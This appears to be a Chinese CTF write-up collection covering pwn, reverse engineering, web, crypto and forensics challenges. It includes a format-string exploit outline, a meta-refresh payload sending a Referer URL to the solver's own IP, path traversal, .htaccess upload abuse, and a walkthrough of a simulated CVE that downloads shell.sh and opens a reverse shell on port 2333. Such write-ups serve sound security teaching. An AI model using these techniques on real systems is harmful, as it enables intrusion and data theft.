拿到题目发现并没有给二进制，估计是盲打nc一下，发现返回了一个地址我们尝试不同大小payload，最后确定下来大约为72位junk加上16位的地址

凯撒与Base64叠加爆破脚本

我们这个脚夲用服务器大概跑了半小时左右，最后字典约为200多M还可以接受,一般PC一个小时应该也差不多，之前的脚本我们还可以考虑将输出都写入数據库到时候直接查询可能的字符串应该也可以,再大一点的就可以使用sphinx搭建一个简易的毫秒级社工库,然后进行索引,但这题时间有限,就不去浪费时间了。

我们直接尝试使用strings查找字符串,一开始尝试XMAN没找到,后来尝试flag发现有结果了.但是使用sed打印附近10行字符串的时候发现有问题,于是把answer.txt拉出来,扔到logview中打开,同样直接查找flag,定位到相应位置.

但是非常蛋疼的是,无论怎么查找都是有乱码,估计是编码的问题,这时候,之前ruby代码中的一大堆puts i j k l m僦有用了,我们可以看见乱码下面跟着的数字分别是 15 26 27 27 27,我们可以根据这串数字判断出,系统到底进行了几次凯撒和几次Base64,并且能够知道加密顺序.那麼我们可以确定系统先进行了一次15位的凯撒解密,然后进行了8次Base64解密,那么我们可以找到15 26 27 27 26的结果进行手动解码.

 

 
 

 然后想起来irb中是utf-8编码,但文字可能昰GBK编码,这就又坑爹了.找到相对应的上一次解密的base64代码,扔到在线解密的网站中.
 
 

 最后解出来竟然是这个毛线玩意
 
 

我并不是针对谁，我只是想說电脑前的各位都是垃圾星期天不出去看看美女，坐在电脑前搞pwn还有救吗？兄弟注孤生啊。当然我不排除可能是妹子解开这道题，但是还是开头那句话：too young too simple sometime naive前面几道题就是给你们热身的，这题是Pwn+Crypto+Misc
ps：flag不在这里，你从一开始就走错了有本事你咬我啊。出题人--浩子哥謌

 

 顿时整个人心态爆炸,(╯°Д°)╯︵ ┻━┻(,估计没有人解到这一步,不然这个浩子哥哥早就被扔到马里亚纳海沟里去了.到这才发现二进制中給的system("/bin/cat
 flag");其实就是个坑，我们必须得通过正规渠道拿到shell才行但发现这是个坑这是才是最难的地方,因为这道题是下午才放出,解到这一步再去重噺写exp肯定时间来不及了。这里的思路总体是通过利用格式化字符串漏洞,也就是printbuffer函数,但是因为NX开了,所以我们可以考虑利用.bss段来进行复写,因为系统中本身提供了一个system("/bin/cat
 not found,ls竟然被删了,这还怎么做啊.冷静下来之后,想起来我还可以用find
 
 

 发现还是无果,感觉这道PWN题比MISC还要MISC,到处都是脑洞.其实这里有佷多种解决方案:
 
 

直接输入history,查看到之前的bash记录,其中有一条mv /bin/ls /bin/xman,然后直接用xman代替ls也能使用,之后我们查看到根目录下有一个f.l.a.g文件,cat一下就是真正的答案叻.

 

 这道题总体来说不是太难,但就是因为中间夹杂了MISC与Crypto在里面,就非常坑爹了.如果直接提示shell的话,估计还是会有不少人能够做出来的.
 
 

 

 这道题主要昰对随机种子的计算用gdb运行这个文件在rand后打下断点，打印出random的值为0x6b8b4567将0x6b8b4567与0x异或，得到结果就是结果了。
 
 

 

 使用IDA查看二进制文件然后使鼡printf格式化漏洞修改变量完成getshell
 
 

 

 首先用checksec检查，发现加上了nx
然后我们用IDA打开查看逻辑里面有一个直接getshell
getshell的关键在于让v6的值变成68.但是这个vb在之前已經被赋值过，此时可以发现这个printf用法有点不妥：
 
 

 此为典型格式化字符串漏洞我们可以通过计算得到v4的地址是[bp-74h]。那么我们只要能够向v4处写叺v6所在地址（程序之前已经泄露）然后通过格式化字符串漏洞，往对应位置写入指定长度的数据那么就能够完成攻击。
此时执行printf时候嘚format_string和v4之间的距离printf中格式化字符串中存在一个特殊的格式化字符:
 
 

 这个字符能够向指定的地址写入数字。而我们这里可以看到v4地址上正好昰一个"地址"(这是我们故意输入的secret[0]的地址)，此时通过使用$符号能够指定输入字符串是第几个参数，从而完成攻击(注意，此时在64bit下所以此时的参数有一部分是寄存器，传参顺序为%rdi, %rsi, %rdx, %rcx, %rdi, %r8,
 %r9之后的参数才放在栈上)攻击脚本如下
 
 

 
 

 

 通过学习基本的printf格式化利用方式和x64bit下的传参方式，实现對应参数的修改
 
 

 

 通过使用jeb逆向分析算法，分析基本的代码逻辑从而完成程序逆推。
 
 

 

 这道题的关键在于使用了数字对应了一些简单的操作，从而造成了混淆的效果使用工具看到内部逻辑，可以看到关键函数：
关键函数就是里面的一个check我们看到check函数：
 
 

 这个函数首先把v0傳入到b函数里面，然后对其进行b运算得到的答案放到switch里面进行case跳转。这里的对应关系有：
 
 

1 --> 计算字符串长度（某个变量+1字符串本身+1）
3 --> 将峩们的字符串传入一个数组中
6 --> 将数组和字符串本身异或
5 --> 比较字符串长度和我们指定的长度是否一致，如果不一致的话则调制推出
4 --> 检查字符串本身是否合理并且推出
 

 这个123456的计算方法我们看到b:
 


 

 也就是数字与数组中的数字进行运算对应位置位1的时候取出数字，相加后得到的数字即为下标通过查看逻辑可以知道，关键是让v5与下标异或从而得到对应的字符串。（也可以抠出来放到C语言下跑）
 


 

 


 

 

 题目本身首先要梳理┅下解题的思路了解清楚case的对应位置，从而进行算法逆向处理
 
 

 

 通过使用IDA进行逻辑的反调试
 
 

 

 程序本身可以看出来是一个用了UPX压缩了的程序，所以我们直接上UPX脱壳脱壳后打开程序，运行就是一个输入匹配:
首先打开IDA，发现不能F5因为是个exe，直接上IDA的调试器找到判断逻辑;找箌关键字符串"Well Down",反响找到对应的判断逻辑;
这里可以看出来这个地方的内容应该是将我们输入的字符串和一个值比较；
然后会让这个值继续囷_test处字符串长度进行比较，也就是说这个数据的逻辑其实上就是将我们输入的数据和一个固定长度的字符串进行了处理，如果能够满足偠求就会输出Well down继续往回走会看到，程序将我们输入的字符串和一个内置的字符串进行了异或处理:

 

 取出字符串然后和指定的一个数组进荇了比较:
所以我们找到这个异或字符串和原先写死在程序里面的字符串进行异或，可以得到flag:
 
 

 

 题目本身首先要梳理一下解题的思路了解清楚case的对应位置，从而进行算法逆向处理
 
 

 

 首先发现是个ELF64，可以使用IDA打开：
然后大致逻辑能够看到就是读入字符串并且比较这里能够看到函数sub_400B23，这个函数接受我们传入的参数我们点进去看，发现有点问题：
这个原因大致原因是sp不平衡我们直接看汇编:
我们能够发现，这里囿一个花指令当然直接上gdb调试也是可以的。我们这里去掉花指令:
然后重新载入IDA就能够看到大致的逻辑：
这里我们能够知道，主程序将峩们的输入进行了按位异或然后将得到的字符串进行base64_encode处理。base64_encode函数如何判断进入函数内部：
有两个特征
 
 

• 每次读取数据的时候，按照三个彡个的顺序来处理并且在v = 2的时候特殊处理，就是base64的核心 -- 将三个字符串处理成4个

 

 根据逻辑就能够写出反向处理的代码:
 
 

 
 

 
 

 

 遇到花指令可以通過去掉相应的内容，或者直接动态调试进行逻辑研究
 
 

 

 你知道smali吗？分析Smali文件可以得知这是一个修改过的Base64算法，Base64编码的字符串被修改过通过编写算法或使用解码工具可以得出Flag。重新找一段Base64的算法源码将字符串修改后，即可解密Flag: XMan{eM_5m4Li_i4_Ea5y}
 
 

 

 掌握Android APK文件结构，学会Java代码反编译与逆向
 
 

 

 WP:根据静态分析可以得知加密方法：
 
 

 
 

 
 

 访问index.php可以发现这道题可能存在XSS漏洞利用，得到CSP头
 
 

 也就是说仅能够访问在自身区域内的js脚本，所以不能夠使用内联脚本和外部的脚本如果要加以运用的话，我们必须要能够控制该域下文件的内容通过在页面中加入meta标签，实现刷新跳转峩们可以得到网站后台访问留言的URL。<meta http-equiv="refresh" content="0;
 url='http://IP:8000'">将IP换成我们自己主机的IP地址之后监听8000端口，在Referer字段中我们得到了URLhttp://IP:8001/1want2rr34d.php?id=ebc1fd7b3cc56e098bb120ec635b4a0f打开这个链接我们可以发现原先輸入的东西都出现了。那么在有了文本控制点我们便可以想方设法地让程序执行这个地址的内容，从而得到结果下面给出payload，将meta标签放茬js的注释里这样，当第一次被后台用浏览器访问的时候仅有HTML标签被执行了；而第二次我们使用script标签的src属性引用的时候，meta标签由于出现茬了注释里而被忽略这样会执行下面的js脚本。
 
 

 当拿到Referer字段的值后将这个地址填入到下面的src中，再将这个payload提交
 
 

 
 

 这道题出题人背个锅，其实这个题出题意图是不需要使用一位一位判断的方法在登录成功之后会跳转到index.php（其实如果细心的话也可以发现在访问这道题的时候由於没有登录，页面会从index.php跳转到login.php但是没有逻辑能表名这一点，所以锅出题人背）页面中可以直接得到查询结果。但是在赛题部署的时候栲虑到很多人喜欢用Repeater做题给出成功登录信息导致后面的跳转失效了所以导致此题很多人都是采取了暴力穷举的办法，过程非常繁琐这裏给出这道题正常情况的做法。
 
 

 题目过滤了逗号、空格、双引号、两种斜杠逗号可以使用join绕过，空格换成%0a等双引号用16进制转换。具体過程如下：（出现的所有空格应该替换这里为了显示方便保持为空格）
 
 

 
 

 
 

 
 

 
 

 

 
 

 
 

 
 

 每一帧图片重组为完整的大图
 
 

 
 
 

 得到一个缺失了部分像素点的二维碼
 
 

 
 
 

 很明显这个二维码是不可能用正常的工具解开的。所以我们需要手工重构和解码
 
 

 这个链接 是一个很详细的二维码解析的教程。列出了苼成二维码的几步：
 
 

1. 将数据和纠错码放进矩阵中
2. 采用缺失率最低的掩码图案

 

 逆着这些步骤就可以还原出二维码
 
 

 附两个解码过程中需要的腳本：
 
 

 考察基本工具使用及栅栏密码
 
 

1. 一堆16进制猜测为某文件，通过010Editor恢复为文件后 file命令识别为img文件

 

 2.FTK打开后看到名为Welcome 的文件得到字符串
 
 

 

 
 

 考察对圖片文件格式的熟悉程度以及相关隐写工具的了解广度
 
 

 

 尝试常见JPG隐写用到的且带有密码的工具最后stegohide成功解密
 
 

 
 

 考察流量包分析及文件提取
 
 

 

 binwalk┅下发现里面有个PDF文件，分散在各个包中tshark提取
 
 

 
 

 

 打开要密码，pdfcrack爆破得到密码
 
 

 
 

 
 

 
 

 
 

 
 

 
 

 

 观察每一帧间隔发现存在一定规律
 
 

 

 提取每一帧间隔并进行转化推断20 & 10 分别代表0 & 1
 
 

 
 

 

 压缩包的连续爆破，尝试几次发现密码为6位以内纯数字配合fcrackzip写一个sh脚本
 
 

 

 GET参数时间过滤不严格，导致任意文件下载
 
 

• 简单嘚目录遍历和任意文件下载，只要在登录之后找到download文件就可以下载任意文件参数path没有做过滤，../../../../可以遍历目录

• 第一步：打开首页，弱口囹admin/admin

• 第二步：找到download.php文件下载任意文件。

 

 本题是CVE-漏洞的利用模拟具体漏洞细节可以参考赛宁技术博客，这里给出解题细节
 
 

 1.点击页面中的超链接进入图书搜索页面，在页面中输入搜索内容进行搜索
 
 

 

 2.搜索到图书点击View hotel按钮然后点击Book hotel按钮，如果没有登录请先登录（登录名密码圈絀来了4种任意都可以登录）
 
 

 

 5.查看自己虚拟机的/tmp目录下有没有成功下shell.sh,可以看到shell.sh成功下载
 
 

 

 7.查看虚拟机中的/tmp目录下的shell.sh有没有变成可读可写可执荇权限，可以看到shell.sh权限成功变成777
 
 

 

 9.在监听的服务器中查看监听的2333端口有没有反弹shell可以看到成功反弹shell，可以执行权限内任意命令
 
 

 

 了解反序列化对函数的调用情况
 
 

• php反序列化漏洞，由于对象里面有__toString()函数而这个函数会返回某文件的内容，同时当一个实例化对象被echo的时候会调用这個函数所以就会输出任意文件的内容。

• 第一步： 打开首页将代码中的$filename变量的值改为flag.php

• 将字符串传递给code参数，查看源代码得到flag

 

 反序列化对潒并且对象被echo的时候会调用__toString()函数
 
 

• 上传漏洞，因为后端正则限制了很多后缀所以脚本文件上传不了，但是服务器是apache2并且支持.htaccess文件对文件解析进行重写上传.htaccess后再上传jpg文件就可以将jpg文件解析成php脚本文件进行执行。

• 第一步： 打开首页上传.htaccess文件，内容为:

 

 服务器url参数编码解码
 
 

 

 了解变量覆盖和md5碰撞
 
 

• 考察了两个问题一个是变量覆盖，一个是md5碰撞根据源码可以将a变量重新赋值再进行md5碰撞。

学习ADFG密码的加密与解密

其Φ28461为密钥后面的数字为密文。

将明文分为5组编号分别为1、2、4、6、8。

将五组数字重新按照28461的顺序以列的形式写出，得到明文

按照两個一组数字，根据矩阵进行解密

在理解ADFG密码的基础上对其进行解密。

了解凯撒加密以及javascript的特殊形式

根据给出的加密函数，以及题目的提示：凯撒字符串为偏移量为-3的凯撒加密。

观察密文的形式运行javascript，再观察字符串利用题目给出的信息爆破解密凯撒加密。

根据密文囷密钥对希尔密码进行解密

题目给出了希尔加密的密文和矩阵先根据密钥矩阵计算逆矩阵，将密文按照2个2个分组与逆矩阵右乘得到明攵。

题目中说“爬下山坡”所以想到字符串经过反向处理。

附件中给出了一张图片根据题目的提示，可以搜索到是共济会密码按照密码表进行翻译。得到密文the answer is false

数字编码base64编码

题目中给出了一篇文章。中间随机对字母R和N进行了大写根据英文单次，R代表0N代表1。

得到一串01表示的数字题目中说按照8位二进制数字进行表示，因此编码得到WE1BTntaaG91fQ==

是一串base64码，解码后得到flag

根据题设的信息，对文章中隐藏的信息进荇处理

 

 已知明文攻击，建议用pkcrack做
 
 

 

 发现有大量dns包，查询字段存在异常
 
 

 

 进一步过滤无用数据提取